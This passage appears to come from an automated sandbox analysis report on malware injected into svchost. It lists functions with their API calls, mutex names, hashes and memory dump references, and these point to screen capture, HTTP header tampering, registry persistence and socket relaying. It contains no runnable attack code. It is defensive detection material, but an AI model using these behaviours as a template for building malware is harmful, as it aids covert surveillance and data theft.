                                                                                                                                                                                                                    • Opcode ID: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                                    • Instruction ID: b57c32ef7cd3355056b50e60d3a575415a9a353647a6e2fe4b6cb4813c133737
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75014B349C0240AFE7169B20E84DBDA37A4FB98716F054BA8F5198B2D1CBB556A1CF90
                                                                                                                                                                                                                    Function 02C90280 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31synchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9028E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C9029F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C902A6
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C902B8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C902C9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02C90285
                                                                                                                                                                                                                    • P0#v, xrefs: 02C902A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 1893094850-2586879793
                                                                                                                                                                                                                    • Opcode ID: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                                    • Instruction ID: 7b5619f72061de97dfb8ba50d1b1332e428a752ab455fde5046a9974113a088f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0A730D826A4B7E7125BA09C0DBAE7A9CDF45B15F0046C0F805D3181D7B0861046A1
                                                                                                                                                                                                                    Function 02C8A390 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 30synchronizationsleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8A39E
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8A3AF
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A3B6
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A3C8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8A3D9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}, xrefs: 02C8A395
                                                                                                                                                                                                                    • P0#v, xrefs: 02C8A3B6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutex$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0#v
                                                                                                                                                                                                                    • API String ID: 1893094850-253269245
                                                                                                                                                                                                                    • Opcode ID: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                                    • Instruction ID: 4841972f98751e0d98693809ac7c433629e7ee9a812505941e5fca44fe9b3815
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8F0EC31D81294F7E7125B94DC0DB9E7B5CDF0570AF004281FD0993180E7F08E1487A1
                                                                                                                                                                                                                    Function 02C776E0 Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 02C776E8
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 02C77708
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 02C77711
                                                                                                                                                                                                                    • DeleteDC.GDI32(?), ref: 02C7771D
                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 02C77752
                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C77771
                                                                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 02C77793
                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 02C777A1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Object$CompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2733039346-0
                                                                                                                                                                                                                    • Opcode ID: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                                    • Instruction ID: bfb34221d478f6acdaabe61e514b240ef0dadb0fc3b9fac8cb4bf5e66dc91265
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bb2ac571cb401fe6b4c9584210e2ad626184bbe85346ab9c2802dc2599c5a24
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55110075D81240AFC74ADB68F488FA67BF8EB8D310B154A95F40AC3301D734A8658F60
                                                                                                                                                                                                                    Function 02C7BB10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsWindowVisible.USER32(02C7C29D), ref: 02C7BB2F
                                                                                                                                                                                                                    • GetWindowInfo.USER32(02C7C29D,?), ref: 02C7BB49
                                                                                                                                                                                                                    • GetClassLongA.USER32(02C7C29D,000000E6), ref: 02C7BB9E
                                                                                                                                                                                                                    • PrintWindow.USER32(02C7C29D,?,00000000), ref: 02C7BBB7
                                                                                                                                                                                                                    • BitBlt.GDI32(02C7BD82,?,?,?,?,7694BCB0,00000000,00000000,00CC0020), ref: 02C7BC5E
                                                                                                                                                                                                                      • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                                      • Part of subcall function 02C7B950: SendMessageA.USER32(?,?,00000004,00000000), ref: 02C7B978
                                                                                                                                                                                                                      • Part of subcall function 02C7B950: GdiFlush.GDI32(00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7B98E
                                                                                                                                                                                                                      • Part of subcall function 02C7B950: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02C7B9B4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                    • API String ID: 2334662925-4251816714
                                                                                                                                                                                                                    • Opcode ID: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                                    • Instruction ID: 093ccc57ffc1fd99d080eff7a680f8aef94a22716c52aaadbc85895ac9ea315c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08413C71E00519AFCB15CF58C985AAEFBBABF84308F148259E405A7644DB30BE52CB90
                                                                                                                                                                                                                    Function 02C7FBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBD3
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBFF
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FC26
                                                                                                                                                                                                                    • HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02C7FC6C
                                                                                                                                                                                                                    • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FC7F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                                    • String ID: Accept-Encoding:
                                                                                                                                                                                                                    • API String ID: 853579731-3444961765
                                                                                                                                                                                                                    • Opcode ID: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                                    • Instruction ID: a1939f19b0903ae485086d7e66a7c0367de7593c3fc979b1ec14221293d3a2c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F31FFB1D4121DAFDB50DFA5D885AEEBBB9FF88310F114569ED15E7200D3749A018FA0
                                                                                                                                                                                                                    Function 02C7ABD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC0F
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC3B
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC62
                                                                                                                                                                                                                    • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02C7AC91
                                                                                                                                                                                                                    • lstrcmpiA.KERNEL32(?,80f507eba), ref: 02C7ACA7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                                    • String ID: 80f507eba
                                                                                                                                                                                                                    • API String ID: 410342393-2772689766
                                                                                                                                                                                                                    • Opcode ID: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                                    • Instruction ID: 50cd088300e2c098ad6a19424ca14a86222806e7c165223fdedc0b517644ca9f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31E1B1E40209EFDB40CFA9D885AEEBBF9FB48300F10856AE514E7240E7755A40CF90
                                                                                                                                                                                                                    Function 02C8A9D6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79threadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8A9F7
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B260,02CC7DA0,00000000,00000000), ref: 02C8AA90
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AAA8
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8AAB9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$BackslashCloseCreateInformationPathThread
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$keys
                                                                                                                                                                                                                    • API String ID: 3186380484-1311816763
                                                                                                                                                                                                                    • Opcode ID: 71ac756de49014c82fc43e66e7205a9b122f8058e74f0c633f2cb4bce79185f2
                                                                                                                                                                                                                    • Instruction ID: 31663a969f21679a839c96e740fe0cc2cd9ff88a966b516aecd0452d6e46079d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71ac756de49014c82fc43e66e7205a9b122f8058e74f0c633f2cb4bce79185f2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE214D319851455BDB22DB7499187FEB7E4DF49308F2881D9E845E7240EB71CE09CF90
                                                                                                                                                                                                                    Function 02C93170 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                                    • Process32First.KERNEL32 ref: 02C931C5
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,?), ref: 02C931E0
                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 02C931EC
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93208
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9321A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3955875343-0
                                                                                                                                                                                                                    • Opcode ID: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
                                                                                                                                                                                                                    • Instruction ID: 17a8724991fbeb8b365db2bb00f289a510eb225140cfe046ce7502c62d85ccaf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9511D2729043916BC711DF65EC49A9BBBECEFC9360F008A59FD5483281E7309619CBE2
                                                                                                                                                                                                                    Function 02C76EE6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(02C84ADF,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02C76F4D
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(80000002,80f5007ca,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02C76F6F
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F8A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F9F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                    • String ID: 80f5007ca$software\microsoft
                                                                                                                                                                                                                    • API String ID: 2510291871-1722485806
                                                                                                                                                                                                                    • Opcode ID: c9896e355f72d0ac8f78d9d656b9a9fcbb5e46da394b6be2b37a54d38e5b89ec
                                                                                                                                                                                                                    • Instruction ID: 965a6c0805f5aa3b88c0bc7b017f05e06a6b41355062923ce301ca052dc6195e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9896e355f72d0ac8f78d9d656b9a9fcbb5e46da394b6be2b37a54d38e5b89ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF11C471A40188ABEB24DBA4DCC8FEE776DEB54308F204AADF646D7440D271DE84CB90
                                                                                                                                                                                                                    Function 02C883B0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • shutdown.WS2_32(?,00000001), ref: 02C883CB
                                                                                                                                                                                                                    • shutdown.WS2_32(02C884AC,00000001), ref: 02C883D0
                                                                                                                                                                                                                    • recv.WS2_32(02C884AC,?,00000400,00000000), ref: 02C883EF
                                                                                                                                                                                                                    • recv.WS2_32(?,?,00000400,00000000), ref: 02C88405
                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 02C88419
                                                                                                                                                                                                                    • closesocket.WS2_32(02C884AC), ref: 02C8841C
                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 02C88420
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1638183600-0
                                                                                                                                                                                                                    • Opcode ID: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
                                                                                                                                                                                                                    • Instruction ID: 050308a56ae31777cf988864614140b0bd900212560c140347662cfed291bd14
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db002666e193d67a4fa707397537c28dadfaec4b9e9a6e682c755636d7f6cf5f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85F031B29503187BD720AA65CC85F9B3B6CAB88B94F004644BB09BB180D6B4F941CEE4
                                                                                                                                                                                                                    Function 02C89130 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41memorysynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocMutexObjectProcessReleaseSingleWaitmemset
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 819421891-3387790918
                                                                                                                                                                                                                    • Opcode ID: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
                                                                                                                                                                                                                    • Instruction ID: e6f4492e7aabcac417ad51598b3df8eae1fa1d9cfa0e8139636ceb90c3e03de5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf17576b4b3f9974584de17eb10b964acc128a6fc0dcc4f49bd0e869d17f9889
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E01F3B0E81B11AFC32ACF28E844B46FBF4BF48710F048A5AE55A87780D730B950CB90
                                                                                                                                                                                                                    Function 02C97A50 Relevance: 10.1, APIs: 8, Instructions: 95memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C97ABD
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C97AD1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C97AE3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C97AF3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1670920773-0
                                                                                                                                                                                                                    • Opcode ID: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
                                                                                                                                                                                                                    • Instruction ID: e3683514777bb9f53f8e9e1f0d5adb4f683b40bf835c875ad3306b9d633f3255
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d57ac4135c724d8a926893770527e68ed6947d970c3d55a6b6301d0a02dcde21
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1631A171E41344ABDF219F69D848BAABBA8EF84314F048589ED0597246CB30DA55CBA0
                                                                                                                                                                                                                    Function 02C9C97A Relevance: 9.1, APIs: 6, Instructions: 141fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • free.MSVCRT ref: 02C9C81F
                                                                                                                                                                                                                    • MoveFileA.KERNEL32(?,?), ref: 02C9CA0D
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C9CA51
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C9CAC3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
